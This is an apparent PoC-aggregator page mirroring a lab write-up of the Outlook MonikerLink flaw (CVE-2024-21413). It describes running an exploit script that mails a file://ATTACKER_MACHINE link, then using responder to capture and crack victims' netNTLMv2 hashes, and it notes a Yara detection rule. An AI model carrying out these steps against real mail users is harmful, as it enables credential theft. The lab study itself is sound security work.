关联漏洞
标题:Microsoft Outlook 安全漏洞 (CVE-2024-21413)描述:Microsoft Outlook是美国微软(Microsoft)公司的一套电子邮件应用程序。 Microsoft Outlook 存在安全漏洞。以下产品和版本受到影响:Microsoft Office 2019 for 32-bit editions,Microsoft Office 2019 for 64-bit editions,Microsoft 365 Apps for Enterprise for 32-bit Systems,Microsoft 365 Apps for Enterprise
描述
This repository contains research notes and a high-level proof-of-concept (PoC) for CVE-2024-21413, a vulnerability observed in certain mail clients when handling SMB/moniker-style links embedded in messages. The PoC and experiments documented here were performed in a controlled lab environment on systems.
介绍
# 💻 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC
## 🧩 Overview
> This project reproduces the MonikerLink behavior (CVE-2024-21413) in a fully isolated TryHackMe environment to show how certain hyperlink formats can cause Outlook to process a link in a way that leaks authentication attempts or leads to further exploitation. The deliverable is a PoC, and a prioritized set of mitigations and detection suggestions that security teams can apply. No live / unauthorized systems were targeted.
---
## ⚙️ Tools & Technologies
| Tool / Skill | Purpose |
|---------------|----------|
| 🐍 Python | Script development |
| 💻 Linux (Kali) | Target system |
| 🔐 Metasploit | Exploitation & access |
| 🧱 TryHackMe Lab | Controlled environment |
---
## 🚀 Setup & Execution
- Open terminal on Linux on attacking machine
- Created a python file and pasted the code [exploit.py](exploit.py)
>This code is written by CMNatic and can be found [here](https://github.com/CMNatic/CVE-2024-21413)
- I modified the code to fit with my machine's environment.
>For example, in the following line “<a href=“file://ATTACKER_MACHINE/test!” I replaced "ATTACKER_MACHINE" with the ip address of my attacking machine and in the line “server = smtplib.SMTP('MAILSERVER', 25)”, I changed "MAILSERVER" with the IP address of my victim machine.
- Then I ran th exploit.py file and got the reply saying "the email has been sent"
- To catch the netNTLMv2 (this is a hash that could be decrypted using John the ripper or other tools and plain paswords can be retrieved). So I used a tool called responder to capture the response from victim machine. The commmand to execute the responder was
> responder -I ens5
- Here -I stands for the interface and i used ens5 interface. In my case the command showed error so to resolve it i first used the following command and retried the above command and it worked
> systemctl start systemd-resolved
- Then I logged into my victim machine
- I opened outlook and opened the link within the mail i sent from attacking machine
- This way upon one click on the link the responder on my attacking machine was able to catch the netNTLMv2 hash
---
<p>This proof-of-concept exposes a nuance in Microsoft Outlook’s link handling: certain file://–style moniker links that reference SMB resources may evade Outlook’s standard filtering and provoke outbound authentication attempts. The behavior demonstrated here was reproduced in a fully controlled TryHackMe lab and highlights how seemingly benign link formats can mask network interactions. Although vendor patches and detection guidance have been issued, the underlying mechanics remain complex due to legitimate uses of the moniker/file scheme. Importantly, the activity generated by this PoC is observable at the network level (for example, in packet captures showing NTLM authentication attempts), making it amenable to forensic analysis and incident investigation.</p>
## Detection
A Yara rule has been created by Florian Roth to detect emails containing the :file:\\: element.
文件快照
[4.0K] /data/pocs/0d4cd4d1b8d58b9e77bb4d95992a4f613a14e171
├── [1.2K] exploit.py
├── [3.2K] README.md
├── [177K] responder.png
└── [ 62K] wireshark.png
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。